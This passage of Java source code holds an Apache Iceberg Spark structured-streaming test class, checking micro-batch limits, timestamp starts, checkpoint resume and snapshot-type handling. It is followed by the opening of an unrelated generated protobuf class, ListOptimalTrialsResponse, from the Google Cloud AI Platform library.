SimpleRecord(3, "three")), Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five"))), Lists.newArrayList( Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")), Lists.newArrayList(new SimpleRecord(8, "eight"), new SimpleRecord(9, "nine"))), Lists.newArrayList( Lists.newArrayList( new SimpleRecord(10, "ten"), new SimpleRecord(11, "eleven"), new SimpleRecord(12, "twelve")), Lists.newArrayList( new SimpleRecord(13, "thirteen"), new SimpleRecord(14, "fourteen")), Lists.newArrayList( new SimpleRecord(15, "fifteen"), new SimpleRecord(16, "sixteen")))); @BeforeAll public static void setupSpark() { // disable AQE as tests assume that writes generate a particular number of files spark.conf().set(SQLConf.ADAPTIVE_EXECUTION_ENABLED().key(), "false"); } @BeforeEach public void setupTable() { sql( "CREATE TABLE %s " + "(id INT, data STRING) " + "USING iceberg " + "PARTITIONED BY (bucket(3, id)) " + "TBLPROPERTIES ('commit.manifest.min-count-to-merge'='3', 'commit.manifest-merge.enabled'='true')", tableName); this.table = validationCatalog.loadTable(tableIdent); microBatches.set(0); } @AfterEach public void stopStreams() throws TimeoutException { for (StreamingQuery query : spark.streams().active()) { query.stop(); } } @AfterEach public void removeTables() { sql("DROP TABLE IF EXISTS %s", tableName); } @TestTemplate public void testReadStreamOnIcebergTableWithMultipleSnapshots() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); StreamingQuery query = startStream(); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadStreamWithMaxFiles1() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 
1L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithMaxFiles2() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithMaxRows1() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); // soft limit of 1 is being enforced, the stream is not blocked. 
StreamingQuery query = startStream(ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1")); // check answer correctness only 1 record read the micro-batch will be stuck List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual) .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS)); } @TestTemplate public void testReadStreamWithMaxRows2() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L), Trigger.AvailableNow()); StreamingQuery query = startStream(ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2")); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual) .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS)); } @TestTemplate public void testReadStreamWithMaxRows4() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithCompositeReadLimit() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1", SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1", SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); } 
@TestTemplate public void testAvailableNowStreamReadShouldNotHangOrReprocessData() throws Exception { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .trigger(Trigger.AvailableNow()) .option("path", output.getPath()); List<SimpleRecord> expected = Lists.newArrayList(); for (List<List<SimpleRecord>> expectedCheckpoint : TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) { // New data was added while the stream was not running appendDataAsMultipleSnapshots(expectedCheckpoint); expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint)))); try { StreamingQuery query = querySource.start(); // Query should terminate on its own after processing all available data assertThat(query.awaitTermination(60000)).isTrue(); // Check output List<SimpleRecord> actual = spark .read() .load(output.getPath()) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); // Restarting immediately should not reprocess data query = querySource.start(); assertThat(query.awaitTermination(60000)).isTrue(); assertThat(query.recentProgress().length).isEqualTo(1); assertThat(query.recentProgress()[0].sources()[0].startOffset()) .isEqualTo(query.recentProgress()[0].sources()[0].endOffset()); } finally { stopStreams(); } } } @TestTemplate public void testTriggerAvailableNowDoesNotProcessNewDataWhileRunning() throws Exception { List<List<SimpleRecord>> expectedData = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expectedData); long expectedRecordCount = expectedData.stream().mapToLong(List::size).sum(); table.refresh(); long expectedSnapshotId = 
table.currentSnapshot().snapshotId(); String sinkTable = "availablenow_sink"; StreamingQuery query = spark .readStream() .option(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1") .format("iceberg") .load(tableName) .writeStream() .format("memory") .queryName(sinkTable) .trigger(Trigger.AvailableNow()) .start(); assertThat(query.isActive()).isTrue(); // Add new data while the stream is running List<SimpleRecord> newDataDuringStreamSnap1 = Lists.newArrayList( new SimpleRecord(100, "hundred"), new SimpleRecord(101, "hundred-one"), new SimpleRecord(102, "hundred-two")); List<SimpleRecord> newDataDuringStreamSnap2 = Lists.newArrayList( new SimpleRecord(200, "two-hundred"), new SimpleRecord(201, "two-hundred-one")); appendData(newDataDuringStreamSnap1); appendData(newDataDuringStreamSnap2); // Query should terminate on its own after processing all available data till expectedSnapshotId assertThat(query.awaitTermination(60000)).isTrue(); List<SimpleRecord> actualResults = spark .sql("SELECT * FROM " + sinkTable) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); long endOffsetSnapshotId = StreamingOffset.fromJson(query.lastProgress().sources()[0].endOffset()).snapshotId(); // Verify the stream processed only up to the snapshot present when started assertThat(expectedSnapshotId).isEqualTo(endOffsetSnapshotId); // Verify only the initial data was processed assertThat(actualResults.size()).isEqualTo(expectedRecordCount); assertThat(actualResults).containsExactlyInAnyOrderElementsOf(Iterables.concat(expectedData)); } @TestTemplate public void testReadStreamOnIcebergThenAddData() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; StreamingQuery query = startStream(); appendDataAsMultipleSnapshots(expected); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromTimestamp() throws Exception { 
List<SimpleRecord> dataBeforeTimestamp = Lists.newArrayList( new SimpleRecord(-2, "minustwo"), new SimpleRecord(-1, "minusone"), new SimpleRecord(0, "zero")); appendData(dataBeforeTimestamp); table.refresh(); long streamStartTimestamp = table.currentSnapshot().timestampMillis() + 1; StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp)); List<SimpleRecord> empty = rowsAvailable(query); assertThat(empty).isEmpty(); List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromFutureTimetsamp() throws Exception { long futureTimestamp = System.currentTimeMillis() + 10000; StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(futureTimestamp)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).isEmpty(); List<SimpleRecord> data = Lists.newArrayList( new SimpleRecord(-2, "minustwo"), new SimpleRecord(-1, "minusone"), new SimpleRecord(0, "zero")); // Perform several inserts that should not show up because the fromTimestamp has not elapsed IntStream.range(0, 3) .forEach( x -> { appendData(data); assertThat(rowsAvailable(query)).isEmpty(); }); waitUntilAfter(futureTimestamp); // Data appended after the timestamp should appear appendData(data); actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(data); } @TestTemplate public void testReadingStreamFromTimestampFutureWithExistingSnapshots() throws Exception { List<SimpleRecord> dataBeforeTimestamp = Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")); appendData(dataBeforeTimestamp); long streamStartTimestamp = System.currentTimeMillis() + 2000; // Start the stream with a future timestamp after the current 
snapshot StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).isEmpty(); // Stream should contain data added after the timestamp elapses waitUntilAfter(streamStartTimestamp); List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromTimestampOfExistingSnapshot() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; // Create an existing snapshot with some data appendData(expected.get(0)); table.refresh(); long firstSnapshotTime = table.currentSnapshot().timestampMillis(); // Start stream giving the first Snapshot's time as the start point StreamingQuery stream = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(firstSnapshotTime)); // Append rest of expected data for (int i = 1; i < expected.size(); i++) { appendData(expected.get(i)); } List<SimpleRecord> actual = rowsAvailable(stream); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamWithExpiredSnapshotFromTimestamp() throws TimeoutException { List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one")); List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two")); List<SimpleRecord> thirdSnapshotRecordList = Lists.newArrayList(new SimpleRecord(3, "three")); List<SimpleRecord> expectedRecordList = Lists.newArrayList(); expectedRecordList.addAll(secondSnapshotRecordList); expectedRecordList.addAll(thirdSnapshotRecordList); appendData(firstSnapshotRecordList); table.refresh(); long firstSnapshotid = table.currentSnapshot().snapshotId(); long firstSnapshotCommitTime = table.currentSnapshot().timestampMillis(); 
appendData(secondSnapshotRecordList); appendData(thirdSnapshotRecordList); table.expireSnapshots().expireSnapshotId(firstSnapshotid).commit(); StreamingQuery query = startStream( SparkReadOptions.STREAM_FROM_TIMESTAMP, String.valueOf(firstSnapshotCommitTime)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(expectedRecordList); } @TestTemplate public void testResumingStreamReadFromCheckpoint() throws Exception { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .queryName("checkpoint_test") .option("path", output.getPath()); StreamingQuery startQuery = querySource.start(); startQuery.processAllAvailable(); startQuery.stop(); List<SimpleRecord> expected = Lists.newArrayList(); for (List<List<SimpleRecord>> expectedCheckpoint : TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) { // New data was added while the stream was down appendDataAsMultipleSnapshots(expectedCheckpoint); expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint)))); // Stream starts up again from checkpoint read the newly added data and shut down StreamingQuery restartedQuery = querySource.start(); restartedQuery.processAllAvailable(); restartedQuery.stop(); // Read data added by the stream List<SimpleRecord> actual = spark.read().load(output.getPath()).as(Encoders.bean(SimpleRecord.class)).collectAsList(); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } } @TestTemplate public void testFailReadingCheckpointInvalidSnapshot() throws IOException, TimeoutException { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File 
writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .queryName("checkpoint_test") .option("path", output.getPath()); List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one")); List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two")); StreamingQuery startQuery = querySource.start(); appendData(firstSnapshotRecordList); table.refresh(); long firstSnapshotid = table.currentSnapshot().snapshotId(); startQuery.processAllAvailable(); startQuery.stop(); appendData(secondSnapshotRecordList); table.expireSnapshots().expireSnapshotId(firstSnapshotid).commit(); StreamingQuery restartedQuery = querySource.start(); assertThatThrownBy(restartedQuery::processAllAvailable) .hasCauseInstanceOf(IllegalStateException.class) .hasMessageContaining( String.format( "Cannot load current offset at snapshot %d, the snapshot was expired or removed", firstSnapshotid)); } @TestTemplate public void testParquetOrcAvroDataInOneTable() throws Exception { List<SimpleRecord> parquetFileRecords = Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")); List<SimpleRecord> orcFileRecords = Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")); List<SimpleRecord> avroFileRecords = Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")); appendData(parquetFileRecords); appendData(orcFileRecords, "orc"); appendData(avroFileRecords, "avro"); StreamingQuery query = startStream(); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf( Iterables.concat(parquetFileRecords, orcFileRecords, avroFileRecords)); } @TestTemplate public void testReadStreamFromEmptyTable() throws Exception { 
StreamingQuery stream = startStream(); List<SimpleRecord> actual = rowsAvailable(stream); assertThat(actual).isEmpty(); } @TestTemplate public void testReadStreamWithSnapshotTypeOverwriteErrorsOut() throws Exception { // upgrade table to version 2 - to facilitate creation of Snapshot of type OVERWRITE. TableOperations ops = ((BaseTable) table).operations(); TableMetadata meta = ops.current(); ops.commit(meta, meta.upgradeToFormatVersion(2)); // fill table with some initial data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); Schema deleteRowSchema = table.schema().select("data"); Record dataDelete = GenericRecord.create(deleteRowSchema); List<Record> dataDeletes = Lists.newArrayList( dataDelete.copy("data", "one") // id = 1 ); DeleteFile eqDeletes = FileHelpers.writeDeleteFile( table, Files.localOutput(File.createTempFile("junit", null, temp.toFile())), TestHelpers.Row.of(0), dataDeletes, deleteRowSchema); DataFile dataFile = DataFiles.builder(table.spec()) .withPath(File.createTempFile("junit", null, temp.toFile()).getPath()) .withFileSizeInBytes(10) .withRecordCount(1) .withFormat(FileFormat.PARQUET) .build(); table.newRowDelta().addRows(dataFile).addDeletes(eqDeletes).commit(); // check pre-condition - that the above Delete file write - actually resulted in snapshot of // type OVERWRITE assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE); StreamingQuery query = startStream(); assertThatThrownBy(query::processAllAvailable) .cause() .isInstanceOf(IllegalStateException.class) .hasMessageStartingWith("Cannot process overwrite snapshot"); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( 
ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxRows() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxFilesAndRows() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4", SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotType2RewriteDataFilesIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceFollowedByAppend() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); appendDataAsMultipleSnapshots(expected); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L, 1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeReplaceIgnoresReplace() 
throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); // this should create a snapshot with type Replace. table.rewriteManifests().clusterBy(f -> 1).commit(); // check pre-condition assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.REPLACE); StreamingQuery query = startStream(); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteErrorsOut() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); // this should create a snapshot with type delete. table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // DELETE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE); StreamingQuery query = startStream(); assertThatThrownBy(query::processAllAvailable) .cause() .isInstanceOf(IllegalStateException.class) .hasMessageStartingWith("Cannot process delete snapshot"); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteAndSkipDeleteOption() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); // this should create a snapshot with type delete. table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // DELETE. 
assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE);

    StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_DELETE_SNAPSHOTS, "true");

    assertThat(rowsAvailable(query))
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots));
  }

  /**
   * With streaming-skip-overwrite-snapshots=true the OVERWRITE snapshot is skipped and the
   * stream returns only the originally appended rows — the file added by the overwrite commit
   * is not streamed.
   */
  @TestTemplate
  public void testReadStreamWithSnapshotTypeDeleteAndSkipOverwriteOption() throws Exception {
    table.updateSpec().removeField("id_bucket").addField(ref("id")).commit();

    // fill table with some data
    List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(dataAcrossSnapshots);

    // a placeholder data file (1 declared record, temp-file path) to add in the overwrite commit
    DataFile dataFile =
        DataFiles.builder(table.spec())
            .withPath(File.createTempFile("junit", null, temp.toFile()).getPath())
            .withFileSizeInBytes(10)
            .withRecordCount(1)
            .withFormat(FileFormat.PARQUET)
            .build();

    // this should create a snapshot with type overwrite.
    table
        .newOverwrite()
        .addFile(dataFile)
        .overwriteByRowFilter(Expressions.greaterThan("id", 4))
        .commit();

    // check pre-condition - that the above overwrite operation on table resulted in Snapshot of
    // Type OVERWRITE.
    assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE);

    StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_OVERWRITE_SNAPSHOTS, "true");

    assertThat(rowsAvailable(query))
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots));
  }

  /**
   * We are testing that all the files in a rewrite snapshot are skipped. Creates a rewrite data
   * files snapshot using the existing files.
   */
  public void makeRewriteDataFiles() {
    table.refresh();

    // we are testing that all the files in a rewrite snapshot are skipped
    // create a rewrite data files snapshot using existing files
    RewriteFiles rewrite = table.newRewrite();
    Iterable<Snapshot> it = table.snapshots();
    for (Snapshot snapshot : it) {
      if (snapshot.operation().equals(DataOperations.APPEND)) {
        Iterable<DataFile> datafiles = snapshot.addedDataFiles(table.io());
        for (DataFile datafile : datafiles) {
          // add and delete the same file: a pure rewrite commit with no net data change
          rewrite.addFile(datafile);
          rewrite.deleteFile(datafile);
        }
      }
    }
    rewrite.commit();
  }

  /**
   * Appends each inner list as one snapshot on the Iceberg table at the given location — a list
   * of lists, each inner list representing the data of a single snapshot.
   */
  private void appendDataAsMultipleSnapshots(List<List<SimpleRecord>> data) {
    for (List<SimpleRecord> l : data) {
      appendData(l);
    }
  }

  /** Appends one snapshot of rows using the default parquet write format. */
  private void appendData(List<SimpleRecord> data) {
    appendData(data, "parquet");
  }

  /** Appends {@code data} to the table as a single snapshot using the given file format. */
  private void appendData(List<SimpleRecord> data, String format) {
    Dataset<Row> df = spark.createDataFrame(data, SimpleRecord.class);
    df.select("id", "data")
        .write()
        .format("iceberg")
        .option("write-format", format)
        .mode("append")
        .save(tableName);
  }

  // name of the in-memory sink table that streaming queries write to
  private static final String MEMORY_TABLE = "_stream_view_mem";

  /**
   * Starts a streaming read of the test table with the given read options, writing results to
   * the {@link #MEMORY_TABLE} in-memory sink in append mode.
   */
  private StreamingQuery startStream(Map<String, String> options) throws TimeoutException {
    return spark
        .readStream()
        .options(options)
        .format("iceberg")
        .load(tableName)
        .writeStream()
        .options(options)
        .format("memory")
        .queryName(MEMORY_TABLE)
        .outputMode(OutputMode.Append())
        .start();
  }

  /** Starts a stream with no extra read options. */
  private StreamingQuery startStream() throws TimeoutException {
    return startStream(Collections.emptyMap());
  }

  /**
   * Starts a stream with the given single option plus max-files-per-micro-batch=1, so each
   * micro-batch consumes at most one file.
   */
  private StreamingQuery startStream(String key, String value) throws TimeoutException {
    return startStream(
        ImmutableMap.of(key, value, SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"));
  }

  /** Asserts per-micro-batch record counts using a ProcessingTime(0) trigger. */
  private void assertMicroBatchRecordSizes(
      Map<String, String> options, List<Long> expectedMicroBatchRecordSize)
      throws TimeoutException {
    assertMicroBatchRecordSizes(options, expectedMicroBatchRecordSize, Trigger.ProcessingTime(0L));
  }

  /**
   * Runs a foreachBatch stream over the table with the given options and trigger, collects the
   * row count of every micro-batch, and asserts those counts match
   * {@code expectedMicroBatchRecordSize} (in any order).
   */
  private void assertMicroBatchRecordSizes(
      Map<String, String> options, List<Long> expectedMicroBatchRecordSize, Trigger trigger)
      throws TimeoutException {
    Dataset<Row> ds = spark.readStream().options(options).format("iceberg").load(tableName);

    // synchronized: the foreachBatch callback may run on a different thread than this test
    List<Long> syncList = Collections.synchronizedList(Lists.newArrayList());
    ds.writeStream()
        .options(options)
        .trigger(trigger)
        .foreachBatch(
            (VoidFunction2<Dataset<Row>, Long>)
                (dataset, batchId) -> {
                  syncList.add(dataset.count());
                })
        .start()
        .processAllAvailable();
    stopStreams();

    assertThat(syncList).containsExactlyInAnyOrderElementsOf(expectedMicroBatchRecordSize);
  }

  /** Blocks until the query has processed all input, then reads every row from the memory sink. */
  private List<SimpleRecord> rowsAvailable(StreamingQuery query) {
    query.processAllAvailable();
    return spark
        .sql("select * from " + MEMORY_TABLE)
        .as(Encoders.bean(SimpleRecord.class))
        .collectAsList();
  }
}
googleapis/google-cloud-java
35,877
java-aiplatform/proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ListOptimalTrialsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1/vizier_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1; /** * * * <pre> * Response message for * [VizierService.ListOptimalTrials][google.cloud.aiplatform.v1.VizierService.ListOptimalTrials]. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListOptimalTrialsResponse} */ public final class ListOptimalTrialsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) ListOptimalTrialsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListOptimalTrialsResponse.newBuilder() to construct. 
private ListOptimalTrialsResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListOptimalTrialsResponse() { optimalTrials_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListOptimalTrialsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.class, com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.Builder.class); } public static final int OPTIMAL_TRIALS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.aiplatform.v1.Trial> optimalTrials_; /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * 